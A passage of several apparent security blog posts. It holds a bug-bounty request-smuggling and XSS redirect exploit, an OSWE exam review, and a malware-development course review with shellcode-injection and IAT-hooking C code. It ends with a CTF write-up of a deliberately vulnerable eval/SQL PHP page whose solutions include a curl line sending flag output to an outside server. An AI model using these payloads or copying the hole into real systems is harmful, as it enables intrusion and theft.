X-Forwarded-Url-Base: https://www.rce.wf/cat.html?
X-Forwarded-Request-Context: HackerOne

This simply poisons all links on the error page with a reference to my server at https://www.rce.wf/cat.html? (note the appended ?, which is used to get rid of the automatically appended URL string /rest/services):

While this already looks like a good candidate to be chained with the smuggling, it still requires user interaction: the user (victim) has to click on one of the links on the error page.

However, I was actually looking for something that does not require any user interaction.

A Seemingly Unexploitable ArcGIS XSS

You’ve probably guessed it already. The very same header combination as previously shown is also vulnerable to a reflected XSS. Using a payload like the following for the X-Forwarded-Url-Base:

X-Forwarded-Url-Base: https://www.rce.wf/cat.html?"><script>alert(1)</script>
X-Forwarded-Request-Context: HackerOne

leads to an alert being injected into the error page:

Now, a header-based XSS is usually not exploitable on its own, but it becomes easily exploitable when chained with a request smuggling vulnerability because the attacker is able to fully control the request.

While popping alert boxes on victims that are visiting the vulnerable server is funny, I was looking for a way to maximize my impact to claim a critical bounty. The solution: redirection.

If you’d now use a payload like the following:

X-Forwarded-Url-Base: https://www.rce.wf/cat.html?"><script>document.location='https://www.rce.wf/cat.html';</script>
X-Forwarded-Request-Context: HackerOne

…you’d be able to redirect users without any interaction.

Connecting the Dots

The full exploit looked like the following:

POST /redacted HTTP/1.1
Content-Type: application/json
Content-Length: 278
Host: redacted.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36
Foo: bar

Transfer-Encoding: chunked

4d
{"GeraetInfoId":"61e358b9-a2e8-4662-ab5f-56234a19a1b8","AppVersion":"2.2.40"}
0

GET /redacted/rest/directories HTTP/1.1
Host: redacted.com
X-Forwarded-Url-Base: https://www.rce.wf/cat.html?"><script>document.location='https://www.rce.wf/cat.html';</script>
X-Forwarded-Request-Context: HackerOne
X: X

While executing this attack at around 1000 requests per second, I was able to actually see some interesting hits on my server:

After doing some lookups I was able to confirm that those hits were indeed originating from the program’s internal network.

Mission Completed. Thanks for the nice critical bounty :-)

OSWE Review (AWAE Course)

1 November 2020 at 19:09

Introduction

Once again I am victorious! Being completely transparent, passing that exam was hard – there were periods that totally made me doubt myself. During these times all the blogs you’ve read about people failing multiple times begin to resonate with you. Thoughts such as “who the hell do I think I am to not experience the same” start to creep in. Many people assume that since I have a number of certificates the process must be somewhat trivial, or that I’m some super smart genius. That is 100% false. It’s a grind, a fight and a constant mental battle. The only difference for me is I have been through so many battles that I can more easily block out the noise, not let it totally consume me, and rely on previous successes for confidence. This still takes effort though.

Before we start, there is no way I can provide better information on how to pass the exam than what’s already publicly available; that’s all included in the bookmark section. If you don’t care about the journey feel free to skip to the exam & methodology sections. I never try to give “the best” because best is subjective, relative, and in most aspects I’m still a student. I attempt to provide what I felt was missing from most blogs I read when attempting to study: the context – the thoughts, feelings, emotions and situational metadata most authors never include. So let’s begin with that.

Mindset 💡

I never pursue certificates for job promotion, advancement or anything besides enhancing my personal knowledge, so there’s never any pressure on me besides the kind that’s self-injected. It’s all for the love of learning security and its related disciplines. So if you’re the type who brute-forces exams and doesn’t really care about the knowledge gained, you’re probably not going to like it here. You’ll get (some) technical details sure, but it won’t be an exam-dump thanks-goodbye post. That’s not the point. There’s nothing wrong with trying to put yourself in a better position, but you should be driven solely by passion. Brute-forcing waters our field down – you’ll meet folks with certificates abc-xyz who can’t think or speak beyond basics. To each their own.

Why Go After OSWE

What makes a man go after any certificate? 🤣 It seemed like beautiful pain. I hope no one has forgotten that I obtained CISSP at the beginning of the year, and the AWS Certified Cloud Practitioner, Certified Solutions Architect, and Security Specialty certificates towards the beginning of the summer. I didn’t plan on any of this; I just identify areas where I’m weak and find the best certificates to try to bridge the gap. I couldn’t take it anymore in June, after aimlessly doing nothing for a whole week. I justified purchasing a new course as a birthday gift to myself 😂 how pitiful, I know.

I don’t perform any exploit development, penetration testing or malware reversing for work (90% of this blog). I learn them for fun and to understand the more difficult domains of security. Work is mainly Application Security – so this was one of the rare times I found a certificate that actually aligned directly with what I do day-to-day. That’s not to say that those topics don’t contribute to me having a more intimate comprehensive understanding of security because they do.

I knew the course was mainly source-code review. I thought this was AWESOME since there are not many white-box based courses vs. the million black-box counterparts. I figured because of this a large majority of folks would wash this course and certificate down the drain. Folks want to use their tools and get root👌 If you’re a security professional and you run from source code, I can’t take you seriously. If you can only leverage tools written by others and not develop your own, you’re going to severely limit yourself. One thing that’s maybe more important for web application security professionals: the vulnerabilities occur in the source code and merely manifest themselves in the applications, and the exploits that take advantage of those vulnerabilities need to be developed in some source language. The point is we all need to be comfortable and at home at the source level. We’re more valuable to our teams, developers and the organizations we defend.

Signing Up

You need to register for the course well before you anticipate starting; the slots fill up pretty fast. The same goes for registering for the exam. I registered on June 29th and the first available lab date was July 11th, which I accepted and anxiously awaited. I decided on 90 days of lab time; since I had already done the other certificates, I planned to slow-roll this one and, if possible, pass the exam by the end of the year.

The Lab

If you are not familiar with Offensive Security courses: at the exact time your lab is set to begin, you’ll receive an email with your VPN credentials, the course PDF, and a link to download the videos that go alongside the PDF. Some people are religious about the order in which they prepare, whether it’s videos first or PDF first. Personally, I watch the videos for the entire module once and then replicate using the PDF as reference if needed, since the videos tend to be more verbose.

Along with the materials, once connected to VPN you get your Control Panel to revert machines. Unique to this course, you’re provided with a WIKI. It contains the list of machines in your lab, their IP addresses and credentials. In addition to that you’re provided with skeleton code for most of the exploits throughout the different modules. Thanks offsec! I would recommend you write it all out by hand and never touch these.

I start the lab and 5 days later guess what? The course gets updated! I get an additional 30 days of lab time for free. Talk about positive vibes!

Prior To Upgrade

The PDF was 267 pages and, together with the videos, covered 6 modules.

After The Upgrade

The bulked-up PDF was now 412 pages and included the original 6 modules, 3 additional lab machines with more modern vulnerabilities and exploitation techniques, and 3 machines with no solution, provided purely for exam preparation. Of the 3 new lab machines, 2 were white-box and 1 was black-box. It’s slightly incredible to receive seemingly 50% more content essentially on the house. I welcomed it with open arms.

Throughout the lab you’ll become one with all sorts of SQLi – union-based, time-based, boolean-based, MySQL flavor, Postgres flavor. Authentication bypasses using session hijacking & session riding will become natural, as will XXEs, SSTIs, deserialization, file upload bypasses and others. You’ll find a variety of languages to analyze and get comfortable with, including Java, PHP, Node.js, Python, C# and their web frameworks. For the compiled languages you’ll learn techniques to recover the original source code. They’ll drill the importance of database query logging and how to set it up with the many databases throughout the course.

The difference in this course is the perspective and mindset with which you approach finding the vulnerabilities. They’re all impossible to discover purely from a black-box perspective: you won’t be throwing a vulnerability scanner at any of these boxes to find anything, and sqlmap will not work (it’s not allowed in the exam anyway)! Run nikto, gobuster (or any other Kali tool) if you want, but it’s useless. You need a healthy combination of brainwork and understanding sources to sinks, routes and controllers. Become comfortable understanding code flow, and lots of it. Even following the lab guide and videos, there are still modules that take multiple days to grasp and over a week to replicate. It’s a marathon, not a sprint.

Losing Steam and Yolo’ing It

I was super motivated initially (month 1), putting in like 3-4 hours on weekdays and 8+ on weekends. Life happens and you naturally start to lose steam. That’s why I typically troll Reddit for Discord groups with others studying for the same or similar certificates. You’re not always going to be motivated, and having others locked in keeps you accountable and in the game. There will always be folks to bounce ideas off of, rant and cry to. Probably the most special part is just having friends across the globe who love the same thing as you. Once you have enough friends it’ll be impossible to slack, because you’ll have friends in all time zones to exchange knowledge with during breakfast, lunch, dinner and while you sleep. Greetz to all my boys in the Discord server mentioned below.

Towards the beginning of October (month 3) I found myself skipping the lab completely for 3-4 days at a time. It was easier to just say whatever. My original exam date was October 30th, and I felt like this exam was consuming me way too much and I had been in the lab for way too long. I developed my methodology discussed below and rescheduled the exam for a week earlier, 10/24 at 10:00 EST.

I had completed the entire lab twice (excluding the 1 black-box machine from the updated materials). For that one, I honestly watched the videos 3 times, still didn’t really grasp how I would have been able to achieve such madness start to finish, and wrote it off as not needed. The 2nd time through the lab I took detailed notes – what the high-level steps were to achieve authentication bypasses, what I exploited to get RCEs, what the syntax of the commands I used was, and what I screwed up on or missed that I should be on the lookout for if I come across a similar situation. Lots of times I make snarky comments reminding myself how much of an idiot I am. It helps make things stick.

2 Weeks Before Exam

During the last 2 weeks I decided to give the 3 boxes without solutions a shot. It was a fight (struggle) but I managed to get RCE on both white-box machines in maybe a week and a half. I can remember going an entire weekend stuck and making no progress on one. Those were hard, but it’s a shift in your mindset. You gain this fake confidence in the lab since you can simply look at the PDF & videos and say to yourself, “I knew that, or I would have been able to figure that out”. With no solutions you are on your own and at the mercy of your own brain. Again, like the black-box from the lab, the black-box with no solutions was a brain fu*k. I got the authentication bypass but didn’t want to waste my remaining time on an exam for source-code review worrying about wicked black-box exploits. Not sure why they included these – I guess it’s to supplement those who don’t have experience analyzing from a black-box perspective, since in white-box you tend to leverage both. You see an input field or parameter that looks suspicious, find the method in the source code responsible for processing that input, then follow it to see if it’s sanitized or used in an unsafe way. If those black-box boxes (say that a few times fast) don’t make you sweat – you’re much more 1337 than I am!

Enter The Exam

I have been working on my zen a bunch lately. I spend absolutely zero energy on events I can’t control (weather, politics, someone’s thoughts of me, etc). I spend the majority of my energy on things I have full control of (thoughts, discipline, being thankful, positive outlook). Finally, there are things that I don’t control fully but have some control of (certification exams). For these I shift my goal away from passing and towards giving my absolute max; if I try my best and still come up short, I have achieved my goal anyway. This reduces negative emotions like anxiety and regret.

So it is the Friday evening before the exam and I’m pumped. I’m excited to have a chance to perform. I really only judge myself when I’m facing challenging situations; it’s when your back is against the wall that your resiliency shows, not when things are rosy. I’m a little nervous about the unknown, the shock factor. My only hope was that when I gained access to the exam it didn’t feel like I had been studying for a different certification.

Day1 – 04:30 a.m. I get out of bed since my mind has been racing for a half hour already. I watched the lab videos of exercises I thought were relevant, ensured my notes were organized once more, and wrote myself some positive notes in size 50 font, bolded. The time was dragging but I used it wisely. My fear at this point is that I’m going to get sleepy during the day since I woke up so early, but so be it.

Day1 – 09:45 a.m. I sign into the proctoring software, verify my credentials, display my workspace, and share my screens. I can’t provide specific details here, but after connecting to the exam VPN I was provided 2 web applications and their source code. The Control Panel provided details and instructions on how to access each, the point breakdown, and what constituted successful compromise. The proctor has no audio; you’re able to communicate with them via chat and your webcam is on at all times. I had been through the exam guide and proctoring manual maybe 15 times before this moment. You definitely don’t want to have IT issues the day of your exam.

Box-1 Start

Day1 – 10:00 a.m. I’m off to the races. I went to the homepage of the first application to see what type of application it was, then directly to the source code. My brain is firing on all cylinders but there’s a LOT of code. Connect the dots. I got the authentication bypass at 18:53. At this point I’m thinking, “Damn, I might fail this based off running out of time”.

Box-1 Authentication Bypass Complete (8 hours 53 minutes)

Did I mention I had PRK eye surgery a week before the exam? It’s like the precursor to LASIK but more stable and permanent. This is significant since folks typically want to know how often you took breaks. I was taking medicated eye drops every 4 hours and rewetting drops every hour, and every half hour I’d have to look away for at least a minute to focus on objects far away so I didn’t hurt the recovery of my eyes. In the time it took to get the first authentication bypass, I took one 30-minute break to eat.

Day1 – 10:00 p.m. Things are hazy and waking up so early is beating me up right now. I know exactly what I have to do and I’m trying, but it just won’t work. I’m making stupid scripting mistakes and wasting time on silly things from being tired. I take a small break and promise myself I will go to sleep if I can get the RCE.

Day2 – 12:00 a.m. – I get the RCE and fulfill my promise. I feel okay now since I think I started with the tougher application, and it took me around 14 hours start to finish. Off to sleep.

Box-1 RCE Complete (14 hours 15 minutes)
Box-2 Start

Day2 – 04:00 a.m. – What is up with me and 4 a.m.? Anyway, those 4 hours of sleep felt marvelous and I woke up feeling like a tiger! Very motivated. I put on the tea kettle to make myself some ginger tea, notify the proctor I’m back, sit back down and lock back in.

Box-2 Authentication Bypass Complete (29 hours 53 minutes)

Day2 – 2:23 p.m. – I noticed the authentication bypass for this one in less than a half hour. Noticing it and pwning it are totally distinct things. I got the authentication bypass at 14:23. Yes. Imagine knowing what to do and it taking 9-10 hours. The good thing about the second box was that I discovered the RCE while doing reconnaissance for the authentication bypass.

Box-2 RCE Complete (33 hours)

Day2 – 05:00 p.m. – RCE done! Although I have all the points now, I also have a very important week coming up at work, and although I could wait until tomorrow (Monday) after work to write the report, my exam time expires at 10 a.m. Monday. I take a break, eat dinner and start to write the report.

Writing The Report

Day2 – 7:00 p.m. – I had been taking screenshots throughout, but I noticed how much I didn’t grab once I started to go through the sections of Offensive Security’s exam template. TRUST ME .. TRUST ME, you do not want to get lazy on the report after you’ve done the exam, because they will fail you without hesitation! There are plenty of horror stories. Being a former penetration tester who has gone through a couple of Offensive Security certifications before, I understand the level of granularity they expect you to provide.

Along with the proofs and screenshots you should include your methodology to achieve compromise, along with your attack code. I provided everything: what I was thinking, vulnerable methods, pitfalls, and all the other (relevant) things firing off in my brain during a 48-hour exam.

Day3 – 12:00 a.m. – I proofread the report with glossy eyes 4 times and completed the process of uploading the exam reports. After I got the confirmation email I went to bed.

I had to wait an entire 5 days, from Sunday night to Friday, to receive my results: I had achieved the OSWE certification 👏🏽

Exam Methodology

Everything I’m about to mention is taught and reiterated throughout the course. What’s the point? During the exam you’ll need to absorb and internalize tons of new information. A methodology is a general approach that you can refer to when you hit a snag.

If you don’t know how to debug you are dead. You cannot pass without understanding how to debug properly. In interpreted languages that means adding print statements; in compiled languages, actually stepping over/into methods and examining objects, properties and values. Leverage all the techniques taught throughout the course.

General

  • Examine unauthenticated areas of the source-code first
  • Leverage Visual Studio Code Remote SSH Extension
    • Understand the launch.json files in Visual Studio Code
  • Examine the routes to see all the endpoints. Understand the authorization applied to each
  • Review the controllers to understand how user input is handled by the application
  • If possible, always enable database query logging
  • dnSpy to decompile .NET, JD-GUI for Java
  • After checking unauthenticated areas, focus on areas of the application that are likely to receive less attention
  • Investigate how sanitization of user input is performed. Is it done using a trusted, open-source library, or is a custom solution in place?
  • When auditing, realize which code you can reach regardless of conditionals and loops

Potential Authentication Bypass Techniques

  • SQLi
    • Can we create a user account
    • Can we leak hashed passwords, reset tokens and other information to aid in authentication bypass
  • Broken Authentication
    • Does authentication depend on private information that we can leak from DB using above
  • Regular – Time Based – Boolean Based (examples and templates for each)
  • PHP Type Juggling
  • Reading Arbitrary Files w/ XXE
  • XSS -> CSRF (Session Hijacking or Session Riding)

Potential Remote Command/Code Execution

  • Code Injection (Eval – Node.js)
  • Deserialization Bugs (Java, .NET)
  • SSTI
  • Unrestricted File Upload

Hail Mary

  • User Defined Functions
  • 3rd Party Frameworks & Libraries
  • APIs
  • Client Side Attacks
  • Reversing Authentication
  • Brute Forcing Tokens
  • JSP Web Shells

Useful Bookmarks

All the blogs that I used to study. Shoutout to all the authors! Thank you.

Discord Server – https://discord.gg/EDsJkzz8tG

AWAE Hindsight

  • Offensive Security provides you with everything you need to pass the exam but you will also learn new things during the exam
  • I didn’t feel the pain folks were experiencing about latency. I did not touch their Kali instance
  • Be ready to be rattled. Things aren’t in the regular places, are named differently, and paths are different. During the exam do not underestimate how much this can freak you out. Basic Terminal/PowerShell system administration knowledge is your friend – grep, find, writing regular expressions and locating processes
  • Writing the POCs takes the most time since you need to script the entire exploit in one shot. Even with a developer background this took the most time. If Python is your language of choice be sure to know requests inside & out and in particular the session object!
  • Set up local or remote debugging for each lab machine and script the entire exploitation in one shot. This means in one terminal nc -nvlp <port>, in another python main.py 192.168.1.1, and you receive a shell
  • Go through all the modules and, where Offensive Security says “after some time we zeroed in on this class”, actually go through the entire result set and try to analyze it as if you didn’t know which class contained the vulnerability. In the course it’s easy to say, “Oh, they only had 40 results, I would have been able to filter through those” – until it’s time to actually do it

Conclusion

As long as I’m more knowledgeable than I was prior to starting the course, I had a good time and a positive experience. No course is perfect so I don’t nitpick. Some things exceeded my expectations, some didn’t. I would recommend the course since you can’t find any competing courses with the same focus. Thank you Offensive Security.

What’s Next

  • Windows Kernel Programming by the awesome Pavel Yosifovich. I purchased this and really liked it but got caught up. I’m going to finish it this time!
  • SANS 642 London December 2020 😛 Shoutout to my boss! He kept a SANS voucher for me on ice, which I gratefully used the day after submitting my OSWE report #whatbreak
  • I am waiting until the new Offensive Security Exploit Development course comes out early 2021. I’m more interested in that than the PEN-300 they just dropped.


A Review of the Sektor7 RED TEAM Operator: Malware Development Intermediate Course

30 October 2020 at 15:20

Introduction

I recently completed the newest Sektor7 course, RTO: Malware Development Intermediate. This course is a followup to the Essentials course, which I previously reviewed here. If you read my Essentials review, you know that I am a big fan of Sektor7 courses, having completed all 4 that they offer. This course is easily as good as the others, and probably my favorite one yet.

Course Overview

This course builds on the material in the Essentials course, covering more advanced topics and a wider range of techniques. You don’t need to have taken the Essentials course, but it will be easier if you have taken it or already have background knowledge in C, Windows APIs, code injection, DLLs, etc. This is not a beginner course, but the code is well commented and the videos explain the concepts and what the code is doing very well, so with some effort you’ll probably be OK.

Here’s what the Intermediate covers, according to the course page:

- playing with Process Environment Blocks and implementing our own function address resolution
- more advanced code injection techniques
- understanding how reflective binaries work and building custom reflective DLLs, either with source or binary only
- in-memory hooking, capturing execution flow to block, monitor or evade functions of interest
- grasping 32- and 64-bit processing and performing migrations between x86 and x64 processes
- discussing inter process communication and how to control execution of multiple payloads

Module 1: PE Madness

The course begins like Essentials, with a link to the code and a custom VM with all the tools you’ll need. It then does a deep dive into various aspects of the PE format. It’s not comprehensive, which is not surprising if you’ve ever parsed PE headers, but it covers the relevant parts quite well, and in a visual, easy to grasp way thanks to PE-Bear. The main takeaway is understanding the PE header well enough to dynamically resolve function addresses, a technique that is used later to reduce function imports, and to perform reflective DLL injection. I already have some experience with PE parsing, but it’s a foundational topic and seeing someone else’s approach and explanations is always helpful. Getting a deeper dive into PE-Bear’s capabilities is a nice bonus as well.

Next this module covers a custom implementation of GetModuleHandle and GetProcAddress, leveraging the previously covered PE parsing knowledge. This is done to reduce the number of suspicious API calls in the import table, and a code sample is provided to create a PE file with no import table at all.
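
To give a flavor of the custom resolution, here is a bare-bones sketch of a GetProcAddress replacement that walks the export directory (my own simplified version, not the course code; forwarded exports and import-by-ordinal are not handled):

#include <windows.h>
#include <string.h>

FARPROC MyGetProcAddress(HMODULE mod, const char *name)
{
    BYTE *base = (BYTE *)mod;
    IMAGE_NT_HEADERS *nt = (IMAGE_NT_HEADERS *)(base + ((IMAGE_DOS_HEADER *)base)->e_lfanew);
    IMAGE_DATA_DIRECTORY dir = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];
    IMAGE_EXPORT_DIRECTORY *exp = (IMAGE_EXPORT_DIRECTORY *)(base + dir.VirtualAddress);

    DWORD *names = (DWORD *)(base + exp->AddressOfNames);         // RVAs of export names
    WORD  *ords  = (WORD  *)(base + exp->AddressOfNameOrdinals);  // name -> function index
    DWORD *funcs = (DWORD *)(base + exp->AddressOfFunctions);     // RVAs of functions

    for (DWORD i = 0; i < exp->NumberOfNames; i++) {
        if (strcmp((char *)(base + names[i]), name) == 0)
            return (FARPROC)(base + funcs[ords[i]]);              // RVA -> VA
    }
    return NULL;
}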

Module 2: Code Injection

The second module covers five different shellcode injection techniques. The first is the classic OpenProcess -> VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread chain, with some variations thrown in when creating the remote thread. Next is a common thread hijacking technique using Get/SetThreadContext. Third is a different memory allocation method that takes advantage of mapping section views in the local and remote processes, ala Urban/SeasideBishop. The last two methods make use of Asynchronous Procedure Calls (APCs), covering both the standard OpenProcess/QueueUserAPC method and the “Early Bird” suspended process method. All five methods use AES-encrypted shellcode and obfuscate some function calls using the custom GetModuleHandle and GetProcAddress implementations from Module 1.
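
For reference, the skeleton of that first classic chain looks roughly like this (shellcode decryption and the custom API resolution from Module 1 omitted):

#include <windows.h>

// Classic remote shellcode injection: open, allocate, write, run.
BOOL Inject(DWORD pid, const unsigned char *code, SIZE_T len)
{
    HANDLE hProc = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    if (!hProc) return FALSE;

    void *remote = VirtualAllocEx(hProc, NULL, len,
                                  MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hProc, remote, code, len, NULL);
    HANDLE hThread = CreateRemoteThread(hProc, NULL, 0,
                                        (LPTHREAD_START_ROUTINE)remote, NULL, 0, NULL);
    if (hThread) CloseHandle(hThread);
    CloseHandle(hProc);
    return hThread != NULL;
}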

Module 3: Reflective DLLs

This section was one of my favorites, as I didn't have a lot of experience with reflective DLL injection. It covers the classic Stephen Fewer ReflectiveLoader method to create a self-loading DLL and inject it into a remote process without needing to touch disk. The previously covered PE parsing is essential for understanding this part. Also covered is shellcode Reflective DLL Injection (sRDI), by monoxgas, which allows you to convert a compiled DLL into shellcode and inject it. These two techniques are combined to enable the reflective injection of DLLs that you may not have the source for or that do not export a reflective loader function.

Module 4: x86 vs x64

This was my other favorite section, as it was another area I didn't have a ton of prior experience with. It covers Windows 32-bit on Windows 64-bit (WOW64), how 32-bit processes run on modern x64 Windows, and the ins and outs of injecting between x86 and x64 processes. It touches on Heaven's Gate, not in extreme detail, as it's a pretty deep topic that needs a fair bit of background to fully grasp, but enough to get the gist and to be able to make use of it in practice. Templates are provided that use shellcode from Metasploit (also written by Stephen Fewer) to transition from x86 to x64 and inject from a 32-bit process into a 64-bit process, courtesy of some of the code injection techniques from Module 2.

Module 5: Hooking

Module 5 covers three different methods of performing function hooking. It starts with the well-known Microsoft Detours library, which makes hooking different functions a breeze. The second method is Import Address Table (IAT) hooking, which again uses PE parsing knowledge from earlier in the course. The last method was my favorite, as I'd not played with it in the past: inline patching of the target function. All three methods come with the usual well-commented code samples for easy modification.
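
To make the IAT variant concrete, here is a minimal sketch (my own, not the course's sample) that swaps one import pointer in the current module; hook_iat, dllName, and funcName are illustrative names:

#include <windows.h>
#include <string.h>

FARPROC hook_iat(const char *dllName, const char *funcName, FARPROC hook)
{
    BYTE *base = (BYTE *)GetModuleHandleA(NULL);
    IMAGE_NT_HEADERS *nt =
        (IMAGE_NT_HEADERS *)(base + ((IMAGE_DOS_HEADER *)base)->e_lfanew);
    IMAGE_DATA_DIRECTORY dir =
        nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
    IMAGE_IMPORT_DESCRIPTOR *imp =
        (IMAGE_IMPORT_DESCRIPTOR *)(base + dir.VirtualAddress);

    for (; imp->Name; imp++) {
        if (_stricmp((char *)(base + imp->Name), dllName) != 0) continue;
        // OriginalFirstThunk holds the names, FirstThunk the resolved IAT slots.
        IMAGE_THUNK_DATA *oft = (IMAGE_THUNK_DATA *)(base + imp->OriginalFirstThunk);
        IMAGE_THUNK_DATA *ft  = (IMAGE_THUNK_DATA *)(base + imp->FirstThunk);
        for (; oft->u1.AddressOfData; oft++, ft++) {
            if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) continue;
            IMAGE_IMPORT_BY_NAME *ibn =
                (IMAGE_IMPORT_BY_NAME *)(base + oft->u1.AddressOfData);
            if (strcmp((char *)ibn->Name, funcName) != 0) continue;
            DWORD old;
            VirtualProtect(&ft->u1.Function, sizeof(ft->u1.Function),
                           PAGE_READWRITE, &old);
            FARPROC orig = (FARPROC)ft->u1.Function;
            ft->u1.Function = (ULONG_PTR)hook;   // the actual hook
            VirtualProtect(&ft->u1.Function, sizeof(ft->u1.Function), old, &old);
            return orig;   // caller can forward to the original function
        }
    }
    return NULL;
}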

Module 6: Payload Control via IPC

This was a short but sweet section on controlling the number of concurrently running payloads. The idea is to check if your implant is already running on a target machine, and bail out if it is. This is useful in persistence scenarios where your chosen persistence method may trigger your payload or shell multiple times. It works by creating a uniquely named instance of one of four different synchronization primitives: mutexes, events, semaphores, or named pipes. A check is performed when initializing the implant, and if one of the uniquely named objects exists, then another instance of the implant must already be running, so the current one exits. Malware is also known to use this trick, as well as legitimate applications that don’t allow multiple concurrent running instances.
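
A minimal sketch of the mutex variant (my own illustration, with a made-up object name) looks like this:

#include <windows.h>

static HANDLE g_instance_mutex;   // kept open for the implant's lifetime

// Returns nonzero if another instance already created the named mutex.
int already_running(void)
{
    g_instance_mutex = CreateMutexA(NULL, FALSE, "Global\\d2hvYW1p-instance");
    return g_instance_mutex != NULL && GetLastError() == ERROR_ALREADY_EXISTS;
}

At implant start-up you would call already_running() and simply exit when it returns nonzero; the handle is intentionally left open so the name stays claimed until the process dies.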

Module 7: Combined Project

The combined project makes use of most of the previous modules and puts them together to emulate a somewhat real-world scenario: stealing the password of a VeraCrypt volume via API hooking. I really liked this section as it applied the learned concepts in a cohesive way into a project that you could conceivably see in real life. Some additional requirements are in place, namely needing to inject reflective DLLs and cross from x86 to x64. There are also some suggested followup assignments to expand and improve upon the final project and make it stealthier.

Takeaways

I really liked this course, as I expected to from my past experience with Sektor7 courses. I already had experience with most of the topics, but the clarity with which the topics are presented and the supplied working code samples really solidified what I already knew and taught me a fair bit that I didn't. I can't stress enough how helpful the code samples are, as I find the best way for me to learn a new technique is to have a very simple working version to wrap my head around, and then slowly start to add features or make it more advanced. The samples in this course, as well as the other Sektor7 courses, do this very well. They aren't the most cutting edge, and they won't beat AV out of the box, but that's not their purpose. They are teaching tools, and excellent ones at that.

I want to talk a bit about how to get the most value out of this and other Sektor7 courses. It might be easy to just watch the videos, compile the examples, and think “huh, that’s it?”. The real value is having clear explanations of code samples, and then taking that code, playing with it, and making your own. In the Essentials course, I looked up every API call and function I wasn’t familiar with on MSDN and added it as a comment in the code. I made sure I understood exactly what each line did and why. I was familiar with all of the APIs in this course, but even before beginning the videos for a module, I read the code and tried to already have an understanding of it before it was explained. These courses have a lot to give you, as long as you put in your share of effort with the code.

Conclusion

As I’ve said already, I really liked this course. I picked up new knowledge and skills that I can immediately use at work, I have solid code samples to build from, and it didn’t break the bank. You can’t ask for much more from an offensive security course. Props again to reenz0h and the Sektor7 crew. I’m really hoping there will be an advanced course and beyond in the future.

DEVCORE Wargame at HITCON 2020

29 October 2020 at 16:00

Good evening! HITCON 2020, one of the annual gatherings of the security community, wrapped up about a month ago. As usual, we prepared a few small wargame challenges at our booth for attendees to test their skills, along with some nice little prizes for those who solved them.

Over the two days of the event, 92 people logged in and submitted at least one flag. Thanks to everyone who participated! If you didn't manage to finish the challenges in time to claim a prize, don't be discouraged. To give more back to the community, we decided to write a technical article about one of the open-ended challenges, sqltest. After the event we reached out to everyone who solved it, collected their solutions and thought processes, and will introduce them one by one below!

The sqltest Challenge

The core of this challenge consists of just three files: Dockerfile, readflag.c, and index.php. Let's start with the first two. From the Dockerfile below, we can see that the flag is placed in /flag, with permissions set so that only root can read it. A setuid binary /readflag is also provided, allowing anyone to assume the root identity while executing it. The source code of /readflag, shown in readflag.c below, simply reads and prints the contents of /flag. This setup is a very standard wargame challenge where the goal is to get a shell.

Dockerfile

FROM php:7.4.10-apache

# setup OS env
RUN apt update -y
RUN docker-php-ext-install mysqli
RUN docker-php-ext-enable mysqli

# setup web application
COPY ./src/ /var/www/html/

# setup flag
RUN echo "DEVCORE{flag}" > /flag
RUN chmod 0400 /flag
RUN chown root:root /flag
COPY readflag.c /readflag.c
RUN gcc -o /readflag /readflag.c
RUN chmod 4555 /readflag

readflag.c

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>   /* for the set*uid / set*gid calls below */

void main() {
    seteuid(0);
    setegid(0);
    setuid(0);
    setgid(0);

    system("/bin/cat /flag");
}

The above covers the environment setup; the actual challenge begins with index.php below. The $_REQUEST parameters are fully under our control, and apart from isset the challenge performs no other checks. On line 8 the parameters are embedded into a SQL statement and executed. If the query succeeds and returns data, execution proceeds to the block starting around line 15, where the $column variable from $_REQUEST is used again and passed into eval. The approach is now clear: we need to construct a string that is simultaneously valid SQL and valid PHP, such that the SQL query returns a row and the PHP execution runs an arbitrary system command. Then we can get a shell, call /readflag, and obtain the flag!

index.php

<?php
if (!isset($_REQUEST["column"]) && !isset($_REQUEST["id"])) {
    die('No input');
}

$column = $_REQUEST["column"];
$id = $_REQUEST["id"];
$sql = "select ".$column." from mytable where id ='".$id."'" ;

$conn = mysqli_connect('mysql', 'user', 'youtu.be/l11uaEjA-iI', 'sqltest');

$result = mysqli_query($conn, $sql);
if ( $result ){
    if ( mysqli_num_rows($result) > 0 ) {
        $row = mysqli_fetch_object($result);
        $str = "\$output = \$row->".$column.";";
        eval($str);
    }
} else {
    die('Database error');
}

if (isset($output)) {
    echo $output;
}

The Author's Solution

As the challenge author, I should of course toss out my own solution first to get the ball rolling~

exploit:

QueryString: column={passthru('/readflag')}&id=1

SQL: SELECT {passthru('/readflag')} FROM mytable WHERE id = '1'
PHP: $output = $row->{passthru('/readflag')};

This solution abuses a MySQL compatibility feature: {identifier expr} is ODBC escape syntax, which MySQL supports, so its appearance in a statement does not cause a syntax error. We can therefore construct SELECT {passthru '/readflag'} FROM mytable WHERE id = '1', which is still a valid SQL statement. Going one step further, if we remove the whitespace inside the ODBC escape and wrap the string in parentheses instead, it becomes SELECT {passthru('/readflag')} FROM mytable WHERE id = '1'. Thanks to MySQL's syntactic flexibility, this statement is still considered valid and executes with the same result.

Next, look at the PHP statement constructed before entering eval: $output = $row->{passthru('/readflag')}. PHP's syntax is also extremely flexible: the $object->{ expr } form evaluates the expression expr dynamically and uses its result as the property name to access on the object. As a result, the passthru function is called and executes the system command.

A bit of trivia: when thinking of system commands, most people's first instinct is the system function. However, MySQL 8.0.3 added system to its reserved keywords, and this challenge environment runs on MySQL 8.0, so using system would actually fail!

Solutions from Attendees

Since so many solutions were submitted, we grouped them into rough categories. A reminder: the order below only reflects submission time and implies no ranking. Any solution that gets the flag is a good solution! Let's go through them.

ODBC Escape

by Mico (https://www.facebook.com/MicoDer/):

QueryString: column={exec(%27curl%20http://Mico_SRV/?`/readflag`%27)};%23&id=1

SQL: SELECT {exec('curl http://Mico_SRV/?`/readflag`')};# FROM mytable WHERE id = '1'
PHP: $output = $row->{exec('curl http://Mico_SRV/?`/readflag`')};#;

